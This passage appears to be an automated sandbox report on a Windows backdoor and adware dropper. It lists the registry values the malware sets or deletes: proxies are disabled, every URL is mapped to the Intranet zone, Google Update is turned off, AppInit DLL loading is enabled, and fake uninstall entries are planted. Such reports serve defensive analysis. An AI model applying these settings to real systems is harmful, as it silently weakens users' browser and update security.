"Seed" = "B7 57 EE B0 E5 E3 10 EC 02 BE 43 EC 5D 4E C1 7D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1664 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 53 70 89 AC 35 2C E0 D2 72 2C 61 77 C8 5E FE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Follow"
"DisplayName" = "Follow"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"
"NoRepair" = "1"
"ProductName" = "YoUtuBeeAdBlockke"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "YoUtuBeeAdBlockke"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 2F 19 38 DB C5 53 B7 CA E3 49 4A 7E BC A3 4C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:596 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"TyHelpTFUO.exe" = "TyHelpTFUO"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"%original file name%.exe" = "1cae3ce62857807fb52a3fa4bf6a6107"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 7E 28 95 12 E0 26 E7 60 C0 15 E5 45 3F 9D AA"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process TyHelpTFUO.exe:1516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"Publisher" = "PriceLess"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"DisplayName" = "Support PL 1.1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
"usr.1" = "mPgPJqqomjlhabcdef"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
"8b9e4cbc" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"CategoryName" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
